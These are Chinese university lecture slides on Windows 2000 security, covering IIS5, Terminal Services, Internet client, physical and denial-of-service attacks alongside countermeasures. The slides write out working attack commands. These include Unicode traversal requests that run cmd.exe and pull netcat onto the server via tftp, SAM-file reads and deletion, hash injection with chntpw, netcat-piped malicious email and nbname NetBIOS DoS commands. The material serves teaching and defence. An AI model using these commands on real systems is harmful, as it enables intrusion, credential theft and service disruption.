Windows2000系统安全(2)-网络与信息安全

Win2k系统安全(2)胡建斌北京大学网络与信息安全研究室E-mail:hjbin@/~hjbin目录IIS5的安全终端服务器安全MicrosoftInternet客户端的安全物理攻击拒绝服务攻击安全功能和工具IIS5的安全IIS5基础－基本HTTPIIS5基础－CGICGI：CommonGatewayInterface，运行在服务器上的应用程序，能针对每个请求生成动态的内容，扩展了Web功能调用CGI/scripts/cgi.exe?var1+var2Windows中几乎所有的可执行程序都可以作为服务器端的CGI应用程序来执行其中cmd.exe经常被作为寻找的目标IIS5基础－ASP和ISAPIASP：ActiveServerPagesISAPI:InterfaceServerApplicationProgrammingInterface调用ASP/scripts/script.asp?var1=x&var2=y调用ISAPI/isapi.dll?var1&var2HTTP攻击伎俩使用../进行文件系统遍历URL的十六进制编码使用../进行文件系统遍历/../../../../winnt/secret.txt通常是在目录上设置不当的NTFS访问控制列表所导致的/../../../../winnt/repair/samURL的十六进制编码Http允许URL中使用十六进制编码形式输入字符串利用URL的十六进制编码攻击/../../winnt/repair/sam％2F％2E％2E％2F％2E％2E％2Fwinnt/repair/sam能避免入侵检测系统的检测，或可以导致应用程序错误处理输入IIS5缓冲区溢出IPP缓冲区溢出索引服务ISAPI扩展缓冲区溢出CodeRed蠕虫ida/idq缓冲区溢出FrontPage2000服务器扩展缓冲区溢出安全对策在系统驱动器之外的驱动器上安装Web文件夹Web服务器所在的卷应使用NTFS并谨慎设置ACL移动、删除或改名可能被利用的可执行文件：cacls,xcacls在服务器的Write和ExecuteACL中删除Everyone和UsersGroup掌握对日志中攻击标志的分析将文件写入Web服务器如在目标机上建立tftp服务器，然后上载文件：GET/scripts/..%c0%af../winnt/system32/tftp.exe?“-i”+1+GET+nc.exec:\nc.exeHTTP/1.0

将netcat写入到C:\，因为默认情况下所有用户对C:\具有写权限如将目标机器上cmd.exe改名为cmdl.exeGET/scripts/..%c0%af../winnt/system32/cmd.exe?+copy+c:\winnt\system32\cmd.exe+c:\cmdl.exeHTTP/1.0其它自动上载工具：如unicodeloader等通过IIS5提升权限通过InProcesslsapiApps利用RevertToSelf安装MS01-026补丁可以解决源代码泄漏攻击起因IIS中的程序缺陷低劣的Web编程技术常见的漏洞+.htr(ism.dll)Webhits(webhits.dll)Translate:f(WebDAV,httpext.dll)WebDAV目录列表（httpext.dll)Web服务器安全评估工具Web服务器安全忠告Web服务器安全忠告在系统卷之外建立一个独立的卷来存放Web根目录Web服务器所在的卷应使用NTFS文件系统，明确的设置ACL删除Everyone、Users和其它非特权组所在目录上的写文件和执行文件权限不要将私有数据保存在ASP文件或包含有文件中停止AdministrationWeb站点，删除IISAdmin和IISHelp虚拟目录以及它们对应的真实目录目录IIS5的安全终端服务器安全MicrosoftInternet客户端的安全物理攻击拒绝服务攻击安全功能和工具终端服务器安全TSTSTS紧密集成在操作系统内部，免费提供远程管理模式(最多有两个同时连接的会语以及一个控制台)TS可以在你和服务器之间提供不同的认证和加密方法。对Windows2000来说，终端服务器正在逐渐成为与UNIX世界中的SSH一样重要的图形化产品TS的代价

在本节中，我们将从安全的角度来考查TS的基本功能、如何识别和枚举TS、解决不合理的TS实现的问题、已知的针对TS的攻击，以及在网络环境中保护和管理TS的基本知识TS组件服务器远程桌面协议(RemoteDesktopProtocol，RDP)客户端TS服务器TS集成在所有Windows2000服务器中，通过控制面板中的Windows组件功能可以很容易地启用和禁用在以管理模式安装时，服务器是标准的组件；当作为远程应用程序服务器时，它需要额外的授权费用和架构服务器的默认监听端口为TCP3389(稍后将会介绍自行指定端口是很容易的)远程桌面协议(RDP)在客户端和服务器之间的数据传输是通过Microsoft的基于TCP的远程桌面协议(RDP-5)进行的RDP提供了三层加密以确保点对点数据传输的安全性：40、56或128位RC4与WindowsNT版本的RDP-4相比，Windows2000提供了更多的基本功能，可以在大多数的网络环境中高效的使用客户端通过MS安装程序(MSI)软件包安装的独立的16位或32位可执行文件终端服务高级客户端(TerminalServicesAdvancedAlient，TSAC)，基于Win32的ActiveX控件，可以在Web页面中使用MMC管理单元

尽管它们互相之间存在明显的区别，但各种不同的客户端都用完全相同的方法来实现RDP。因此，尽管它们看起来似乎不一样，但所有的TS客户端在与服务器进行对话时都以完全相同的方式进行操作修改TS监听端口－服务器端通过修改下面的注册表键值，TS的默认端口可以重新指定

\HKLM\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp键值：PortNumberREG_DWORD=3389修改TS监听端口－客户端第一步是在TS客户端连接管理器中与目标主机建立连接一旦创建了一个连接之后，选定该连接并从File菜单中选择Export，将全部配置设置保存到以一个CNS为扩展名的文本文件中去使用文本编辑器打开这个文件，将ServerPort修改为在服务器上指定端口，如下例所示(自定义连接端口为7777)

修改TS监听端口－客户端[CorpTermServ]WinPosStr=0,2,0,0,941,639Expand=1SmoothScrolling=0ShadowBitmapEnabled=1DedicatedTerminal=0ServerPort=7777EnableMouse=1[etc.]

识别和查找TS3389端口扫描TSProbeTSEnum

攻击TS密码猜测攻击用户权限提升畸形RDP拒绝服务攻击

密码猜测攻击-TSGrinder.exeTS登录等价于真正的交互式登录，因此对真正的Administrator账户是不能设置锁定阈值的。这意味着在启用了TS服务的情况下，对密码猜测攻击来说，本地Administrator账户是一个最易受攻击的目标TimMullen开发了TSGrinder的工具，它能够通过TS对本地Administrator账户进行字典攻击密码猜测攻击-TSGrinder.exe密码猜测攻击的防御推荐将本地Administrator账户改名防御TS密码猜测攻击的另一种有趣的方法是为Windows登录窗口制作一个自定义的法律声明，通过添加或编辑如下的注册表键值就可以实现：HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinLogon

用户权限提升推荐实现Windows2000ResourceKit中的一些关键功能其中最重要的是，“Appsec”可以使管理员能够限制用户只能运行特定的应用程序这能够减小攻击者在获取本地用户访问之后进行权限提升攻击的危险

IME远程Root获取输入法编辑器(InputMethodEditor，IME)漏洞，这个漏洞导致可以不用提供任何凭据就能通过TS的认证IME用来将标准的101键键盘映射到某种语言中的大量可用字符，例如日语、中文和韩国语都需要IME。虽然IME通常在本地用户的上下文中进行正常操作，但登录时，IME却在SYSTEM上下文中运行。这使得通过远程服务器的登录屏幕运行精心设计的命令成为可能IME对策只有简体中文版系统或在初始安装过程中安装了简体中文IME的系统才会有这个漏洞Microsoft发布的公告MS00-069和补丁能够为所有受影响的版本解决这个问题畸形RDP拒绝服务2001年1月，YoichiUbukata和YoshihiroKawabata发现了RDP中的一个漏洞，这个漏洞可能导致拒绝服务的情况出现。如果攻击者发送一种畸形的报文，它将使RDP瘫痪。这种攻击会导致当前正在进行的全部工作丢失，并且需要重新启动系统才能恢复服务Microsoft发布了一个补丁(MS01-006)，通过修改终端服务器服务使它正确地处理数据，从而消除这个漏洞目录IIS5的安全终端服务器安全MicrosoftInternet客户端的安全物理攻击拒绝服务攻击安全功能和工具MicrosoftInternet

客户端安全攻击类型缓冲区溢出，可被用来执行任意的代码而无需与用户进行任何交互通过欺骗、强制或暗中执行命令，使用户运行由攻击者预先选择的可执行内容。这种方法有以下一些变化：

■

巧妙伪装的、看起来无害的电子邮件附件■ 嵌入在HTMLWeb页面或电子邮件中的可执行内容■ 活动内容技术的漏洞导致非法代码的执行■ ActiveX控件，尤其是那些标记有“可以在脚本中安全使用”的控件■

Java虚拟机的程序缺陷(BrownOrifice)攻击类型访问脚本/自动化接口，例如Outlook地址簿蠕虫写本地文件，通常是在可执行的目录中；经常通过临时目录或缓存位置的不适当泄露发生。一旦在本地写入文件，它就可以执行并运行在本地计算机安全区域的上下文中，从而是完全受到信任的读取本地文件，例如通过HTML跨帧导航问题或使用IFRAME。这种技术的一个常见结果是从Web浏览器的cookie中获取用户的密码数据调用客户端出站连接实现Internet客户端攻击恶意Web页面客户端的一种最常见形式是在Internet上部署恶意的Web服务器，存放经过精心设计的内容，用来诱骗用户的数据这种方法的有效性取决于提高恶意Web站点/页面的访问量，这通常是通过电子邮件或新闻组/列表文章来进行的恶意E-mail由于HTML功能的多样性(嵌入小程序或控件、活动脚本、跨帧浏览、内联帧、cookie解析等等)，HTML电子邮件成为理想的攻击媒介由于接收端的漏洞导致这样的问题，Microsoft虽然备受指责，然而通过Outlook或OutlookExpress(OE)这样的程序发送恶意编写的HTML却十分困难。这些图形化的电子邮件客户端不允许对邮件消息的内容进行直接的操作，而为实现攻击目的却需要这样做如果要在Windows上模拟这种命令行功能，可以通过命令行提示符直接向简单邮件传输协议(SimpleMailTransferProtocol，SMTP)服务器手动发送消息。最佳的办法是将适当的SMTP命令和数据写入到一个文本文件中，然后通过管道输入给netcatEmailHacking首先，将所需的SMTP命令和消息数据写入到一个文件中helomailfrom:<mallory@>rcptto:<hapless@>datasubject:Readthis!Importance:highMIME-Version:1.0Content-Type:text/html;charset=us-asciiContent-Transfer-Encoding:7bit<HTML><h2>HelloWorld!</h2></HTML>.quitEmailHacking然后在命令行中将这个文件通过管道传递给netcat，而netcat则应该指向适当的邮件服务器的SMTP监听端口25，例如：C:\>typemalicious.txt|nc-vv25EmailHacking恶意的攻击者通常会选择一些提供无限制的SMTP消息中继的不引人注意的邮件服务器，而且会尽可能隐藏他们自己的源IP地址，这样就不可能通过邮件服务器的日志来追查到他们这样的“开放式SMTP中继”通常被垃圾邮件所利用，在Usenet的讨论或上经常可以找到这样的服务器EmailHacking如果希望随HTML格式的消息发送一个附件，则必须向消息中添加另一个MIME部分，根据MIME规范(RFC2045-49)用Base64格式对附件进行编码用以自动完成这项工作的最佳工具是JohnG.Myers的mpack。mpack能够自动添加正确的MIME头，这样它的输出就可以直接发送给SMTP服务器下面的例子使用mpack对一个名为plant.txt的文件进行编码，输出到文件plant.mim中。可选的-s参数用以指定消息的主题行

C:\>mpack-sNasty-gram-oplant.mimplant.txtEmailHacking下面将MIME部分插入到现有的HTML格式的消息中去对前面的malicious.txt来说，使用“Content-Type:”一行中自定义的MIME边界来划分该消息。MIME边界以两个连字符开始，结束边界以两个连字符为后缀。还要注意嵌套的“multipart/alternative”MIME部分(boundary2)，这样Outlook接收者就能够正确地对HTML消息正文进行解码一定要十分注意换行的位置，因为MIME的解析根据它们的位置有着很大的不同。这个消息的重要性被设置为high(高)，这是诱使受害者上当受骗的一个伎俩EmailHackingEmailHacking使用管道将这个文件输入给netcat，并发送给开放的SMTP服务器，就能够向hapless@发送一封HTML格式的消息，并包含附件plant.txt要更好地理解多部分消息中的MIME边界，参考RFC2046的第5.1.1节。在OutlookExpress中对收到的消息进行研究，也可以进一步了解其格式单击Properties|Details|MessageSource就可以查看原始数据(Outlook不允许查看全部的原始SMTP数据)缓冲区溢出如果在每天使用的软件——电子邮件客户端中存在缓冲区溢出的漏洞，那么问题就很可怕了。在漏洞得到修正之前，任何使用存在问题的软件的人都将成为目标2000年7月18日；UndergroundSecuritySystemsResearch(USSR)公布了GMT令牌缓冲区溢出漏洞，Outlook和OutlookExpress(OE)的用户随之发现了这一点。通过将GMT令牌放在邮件消息的日期字段中并写入一个超长的值，Outlook和OE就会在POP3和IMAP4下载这样的消息时崩溃。如果可以发送精心设计的日期字段，攻击者选定的程序就可以封装在GMT值中并执行Outlook用户需要预览、阅读、回复或转发这样的消息；OE用户简单地打开含有该消息的文件夹，在消息处理时就会自动发生——OE就会永久性地崩溃，除非清除邮箱Outlook/OEvCard缓冲区溢出这个问题最早由JoelMoses发现，通过打开特定字段中含有大量文本数据的vCards，就可以利用InternetExplorer中的缓冲区溢出vCards是1996年发明的一种电子名片格式，1998年进入RFCvCards以.vcf为文件扩展名。因为在读取vCards时必须解析大量的数据字段，因此它们成为缓冲区溢出攻击的最佳目标Outlook/OEvCard缓冲区溢出尽管受害者必须显式地运行vCard，但由于它是一种方便的个人数据交换格式，因此大多数人都不会有任何的犹豫在默认情况下，Outlook会直接从邮件附件运行vCards而不对用户进行提示，除非安装了Office安全更新。在直接打开磁盘上的.vcf文件时，不会出现提示Outlook/OEvCard缓冲区溢出vCards采用非常简单的ASCII结构，下面的例子是一个名为JohnDoe.vcf的vCard(为了简明起见，删除了一些可选的字段)：Outlook/OEvCard缓冲区溢出如果可选的BDAY(生日)字段超过55个字符，运行它就会导致Outlook终止并溢出含有大量文本数据的EMAIL字段也会导致同样的结果，而在N(姓名)字段中填入大量的文本数据会导致Outlook占用99%的系统CPU资源主要的问题似乎在于Outlook的地址簿，它在试图从vCard导入超长的字段时发生阻塞。用户将存在问题的vCard复制到他们的Outlook/OE的联系人文件夹中，通过Windows资源管理器，或通过嵌入在Web页面或电子邮件消息中的链接打开它时，也会发生问题其它缓冲区溢出Windows媒体播放器.asx缓冲区溢出GeorgiGuninski和RichardSmith发现的ActiveX“SafeforScripting（脚本安全）”问题Access数据库实例化IE5中执行VBA代码写本地文件将文件写入本地磁盘，如果能够写入任意的文件然后又能够执行它们，那么麻烦就大了。如果文件已经写入到磁盘上，那么只有文件系统ACL和它们与用户账户权限的交集能够确定哪些能够被执行而哪些不能，因此只要过了第一关，第二步就很容易了。这种攻击的一种聪明的变种是识别磁盘上可以可靠地写入数据的静态位置——例如，Internet临时缓存文件的名称和位置是可以预测的。这使得攻击者可以实现“选定文件内容”攻击，在文件里面他们可以精心设计恶意的脚本或是其他提交给Internet客户端的指令，以便可以写入到这些可预测的位置之一。一旦完成了这一步，那么通过IFRAME或其他的技术从已知的位置执行这些脚本就很容易了执行被写入临时Internet缓存的.chm文件GeorgiGuninski的第28号公告描述了这个漏洞。它涉及到4个基本的步骤，它们都是在IE或Outlook/OE中装载HTML时进行的：1. 使用一些HTML代码，向IE的Internet临时文件缓存中写入一系列相同的经过特殊设计的已编译HTML帮助文件(.chm)2. 从第一份HTML文档中，装载第二份HTML文档，第二份文档位于另一台服务器上，该服务器的名称与存放父文档的服务器的名称不同3. 识别Internet临时缓存文件夹的位置4. 在查点出的缓存文件夹中执行.chm文件通用对策仔细配置出站网关访问控制，阻塞除由公司策略明显允许的通信之外的全部通信。客户端攻击的最可怕的一种可能就是调用与恶意服务器之间的出站连接在不安全的协议上，例如telnet或SMB不要在重要的服务器

上读取邮件或浏览Web不要在重要的服务器上安装MicrosoftOffice在浏览Web和读取邮件时，尽可能使用非特权用户身份，而不要用Administrator通用对策坚持原则——不要点击不可信的链接或查看不可信的电子邮件附件，最好将其删除一定要及时升级Internet客户端软件。目前，使用Windows更新站点来自动检测和安装你需要的补丁(Microsoft计划在2001年夏天推出一个新的工具，以帮助用户确定他们的IE/OE和Outlook需要安装哪些补丁)。在编写本书时，IE5.5是Microsoft的核心Internet客户端的最新版本，并且ServicePack1也已经发布。在IE中，检查Help|About以查看已经安装了哪些补丁，并且确保你正在使用128位加密强度通用对策不要忘了及时到Office更新站点上对Office进行更新。特别的，确保你已经安装了Outlook电子邮件安全更新适当的设置IE的SecurityZone，包括禁用RestrictedSite区域中的全部功能，然后配置Outlook/OE使用该区域读取电子邮件将安全策略中的Windows2000LANManager认证级别设置为SendNTLMv2ResponseOnly。这能够降低对SMB认证进行窃听攻击的危险(但不能阻止恶意服务器和MITM攻击)通用对策禁用Windows2000telnet客户端的NTLM认证(在命令行中执行telnet命令，然后输入unsetntlm，然后用quit退出)。这能够避免在对telnet://链接进行反应时NTLM凭据在网络上传播在所有的Office应用程序的Tools|Macro|Security中将宏安全性设置为High(高)。这有助于避免Office文档中的恶意宏脚本进行的攻击通用对策在客户端和邮件服务器上，及时更新防病毒标识数据库部署基于网关和邮件服务器的过滤系统，剔除Web页面和电子邮件中的恶意内容如果这些提示没能使你感到安全，那么不要再使用MicrosoftInternet客户端(如果你运行Windows2000，那么实际上这是不可能的)目录IIS5的安全终端服务器安全MicrosoftInternet客户端的安全物理攻击拒绝服务攻击安全功能和工具物理攻击物理攻击如果入侵者能够不受限制地在物理上访问一台Windows2000系统，那么他们如何进行攻击呢？本节将从物理的角度探讨攻击者如何从Windows2000获取数据，通常的方法是引导到另外的操作系统并在离线的状态下对系统的属性进行编辑对SAM进行离线攻击破解通常依赖于获取NT/2000的密码数据库——安全账户管理器(SecurityAccountsManager，SAM)文件通过离线攻击，SAM的内容也可以被坏人获取，只需引导到另一种操作系统，然后将SAM复制到可移动媒体或网络共享中首先介绍一些经典的离线攻击技术，然后分析这些攻击对EFS潜在的影响。最后，讨论EFS攻击的一个例子，它不需要在离线状态下访问系统通过删除SAM废除Administrator密码通过在系统处于离线状态时删除SAM文件，然后就可以在系统重新启动后以空密码登录Administrator账户。这种方法同时也删除了目标系统上所有现有的用户账户，但与磁盘上的重要数据相比，攻击者并不考虑这一点这种攻击有多种实现方式，但最直接的方法是制作一张可引导的DOS系统软盘，并将Sysinternal的ntfsdospro复制到软盘上。然后这张软盘就可以用来将目标系统引导到DOS通过删除SAM废除Administrator密码如果目标系统使用FAT或FAT32，那么只需输入以下命令就可以删除SAM文件：

A:\>delc:\winnt\system32\config\sam如果目标系统使用NTFS文件系统，那么可以使用ntfsdospro将NTFS卷装载到DOS中，然后使用相同的命令来删除SAM通过删除SAM废除Administrator密码当系统稍后重新启动时，Windows2000将重新创建一个默认的SAM文件，它含有Administrator账户，而且密码为空。只需使用这个账户和密码登录，就可以获得对系统的全面控制这里需要注意的是，删除SAM并不会影响Windows2000域控制器，因为它们没有把密码散列保存在SAM中。然而，Grace和Bartlett的文章指出了一种方法，通过在域控制器上安装另一份Windows2000，就可以获得基本相同的效果通过使用chntpw对SAM进行散列注入如果你希望使用更为成熟的物理攻击方法，不想破坏掉系统中全部的账户，可以使用一张Linux引导软盘和PetterNordahl-Hagen的chntpw，在离线状态将密码散列注入到SAM中即使在应用了SYSKEY时，或即使选择了用密码来保护SYSKEY或将它保存在软盘上的选项，注入仍然能够奏效！通过使用chntpw对SAM进行散列注入Petter说明了如何将SYSKEY关闭。更糟的是，他发现攻击者并不需要这样做——只需将旧的、未经SYSKEY处理的散列直接注入到SAM中，在重新启动后，它就会自动被转换为SYSKEY散列关闭SYSKEY的方法1. 将HKLM\System\CurrentControlSet\Control\Lsa\SecureBoot设置为0以禁用SYSKEY(这个键的可能取值为：0——禁用；1——不受保护的密钥保存在注册表中；2——密钥保存在注册表中，受密码保护；3——密钥保存在软盘上)2. 将二进制结构HKLM\SAM\Domains\Account\F中的一个特殊标志位修改为以前SecureBoot的相同模式。在系统处于运行状态时，这个主键是不能访问的3. 在Windows2000中，HKLM\security\Policy\PolSecretEncryptionKey\<default>主键也需要被修改为与以前的两个主键相同的值通过使用chntpw对SAM进行散列注入根据Petter的说法，在NT4SP6之前的系统上只修改前两个值中的一个会导致在完全引导之后出现一个警告，指出SAM和系统设置之间的不一致性，SYSKEY会被重新启用。而在Windows2000上，在重新启动之后，这3个键值之间的不一致似乎直接被重置为最可能的值目录IIS5的安全终端服务器安全MicrosoftInternet客户端的安全物理攻击拒绝服务攻击安全功能和工具拒绝服务攻击拒绝服务(DenialofService，DoS)攻击并不是以窃取用户账户或系统数据为直接目的，而是使系统拒绝合法用户对系统服务的访问DoS可以有很多种形式，例如通过耗尽系统资源，使合法用户访问站点的请求失败，或者通过一个精心制作的与RFC不兼容的报文导致操作系统的挂起在某些情况下，如果攻击需要目标计算机重新启动才能完成，DoS实际上被用来辅助对系统的入侵TCP连接淹没TCP连接淹没（connectflood）方法有时也被称为进程表攻击（processtableattack）。顾名思义，这种方法是与目标之间建立尽可能多的TCP连接，直到目标由于资源耗尽而不能再为请求提供服务为止TCP连接淹没比曾经流行的TCPSYN淹没攻击更为先进，因为它实际上完成了3次握手过程，使目标计算机上的所有套接字都处于ESTABLISHED状态。最终，所有的套接字都被耗尽，目标就不能再接受任何新的连接，而不管它还具有多少可用的内存、带宽、CPU时间等TCP连接淹没应用程序服务级DoS攻击IIS的WebDAVtelnet服务器基于LAN的DoS攻击在面向LAN的Windows2000DoS攻击中，大多数都与NetBIOS有关。NetBIOS的传统问题是它依赖于不可靠的、无认证的服务。它提供了一种IP地址与NetBIOS名称间相互映射的方法，很容易被伪装，因此任何可以连接到本地网络中的人都可以通过声称已经注册了其他合法客户端的NetBIOS名称或者向特定的主机发送“名称释放”报文，从而使合法客户端断开网络收到这种报文的客户端将会完全丢失加入NetBIOS网络的能力，包括访问文件共享、Windows域认证等等基于LAN的DoS攻击下面是使用nbname对一台主机进行DoS攻击的例子。在Windows2000上，你必须首先禁用TCP/IP上的NetBIOS，以避免它与真正的NBNS服务发生冲突，因为NBNS服务通常会大量地使用UDP端口137。然后，运行nbname(使用你要攻击的主机的IP地址代替这里的22)：C:\>nbname/astat22/conflict基于LAN的DoS攻击其中/ASTAT参数用于从目标获取远程适配器的状态，/CONFLICT参数向响应适配器状态请求的计算机的远程名称表格中的全部名称发送名称释放报文通过使用/QUERY[nameIP]/CONFLICT/DENY[name_or_file]参数，攻击者可以对整个网络进行DoS攻击基于LAN的DoS攻击在受害主机上，可能会出现下列症状：网络连接时断时续网络邻居(NetworkNeighborhood)等工具不能正常工作netsend命令不能正常工作受影响的服务器不能认证域登录不能访问共享资源和基础的NetBIOS服务，例如NetBIOS名称解析nbtstat命令会将NetBIOS名称服务的状态显示为Conflict(冲突)Windows2000DDoS僵尸在2000年2月之后，“僵尸”(zombie)这个词开始流行起来，用以代指那些被用来攻击受害者的无辜的DDoS客户端TribeFloodNetwork(TFN)TrinooStacheldrahtTFN2KWinTrinoo防御DoS－联合你的ISP联系你的Internet服务供应商(ISP)，询问他们能够为防止你的连接受到DoS攻击而提供何种措施(如果有)。几乎所有的Internet连接都要经过ISP，不管你的DoS防御策略是多么牢固，如果ISP的连接断开或是饱和，你的措施就没有任何意义防御DoS－联合你的ISP在站点受到攻击时，你的ISP能够做出什么反应。如果可能的话，将你的ISP的网络操作中心(NOC)的联系信息放在手边记住，跟踪找到攻击的发起者是很困难的，但如果你的ISP肯合作并且能够访问你和攻击者之间的路由器，这也是可能实现的防御DoS－配置边界路由器防御DoS及时安装补丁合理配置TCP/IP参数合理配置TCP/IP参数合理配置TCP/IP参数目录IIS5的安全终端服务器安全MicrosoftInternet客户端的安全物理攻击拒绝服务攻击安全功能和工具安全模板和安全配置分析组策略IPSecKerberos加密文件系统(EncryptedFileSystem，EFS)RunasWindows文件保护(WindowsFileProtection，WFP)安全模板、安全配置和分析安全模板(SecurityTemplate)、安全配置和分析(SecurityConfigurationandAnalysis)是在Windows2000环境中部署安全体系时所能使用的最能够节省时间的工具，特别是在与组策略联合使用时安全模板是Windows2000中与安全有关的设置的结构化列表，通过点击鼠标就可以编辑和应用，而无需去寻找和配置本书中已经讨论过的大量分散的安全设置。另外，这些模板文件可以与系统的当前设置进行比较，从而显示出一致和不一致的配置(即分析功能)安全模板、安全配置和分析通过打开一个空白的Microsoft管理控制台(MMC)，然后添加安全模板、安全配置和分析管理单元，就可以使用这两项工具组策略组策略(GroupPolicy)是Windows2000提供的功能最强大的新工具之一，它的作用已经远远超出了安全设置的范围组策略是Windows2000的集中化管理配置管理体系。它是由组策略对象(GroupPolicyObject，GPO)实现的，GPO定义了可以被应用于(或链接到)用户和计算机的配置参数。GPO有两种类型：本地GPO(LGPO)和活动目录GPO(ADGPO)组策略LGPO保存在%systemroot%\system32\GroupPolicy目录中，由以下一些文件组成：gpt.ini，管理模板(.adm)，安全配置文件(.pol)，以及登录/注销和启动/关机脚本ADGPO存储在%systemroot%\system32\sysvol\<domain>\Policies目录中，活动目录中的System|Policy容器中也保存了指向每个ADGPO的指针LGPO只作用于本地计算机。ADGPO则可以应用于站点(site)、域(domain)、组织单位(OrganizationalUnit，OU)，而且多个GPO可以链接到同一个站点、域或OU组策略与安全相关的GPO设置集中在ComputerConfiguration\Win-dowsSettings\SecuritySettings结点之下SecuritySettings(安全策略)结点定义了账户策略、审核策略、事件日志、公钥和IPSec策略由于这些参数可以在站点、域、OU级别上进行设置，大型网络环境中的安全管理工作的负担就可以减轻很多。更好的是，安全模板可以被导入到一个GPO中。因此，组策略是安全地配置大型Windows2000域的最佳方法将安全模板导入组策略IPSecIPSec定义了一种用以获取IP数据报的端到端安全的机制，包括认证、机密性、完整性和防回放服务，而且无需中间设备来理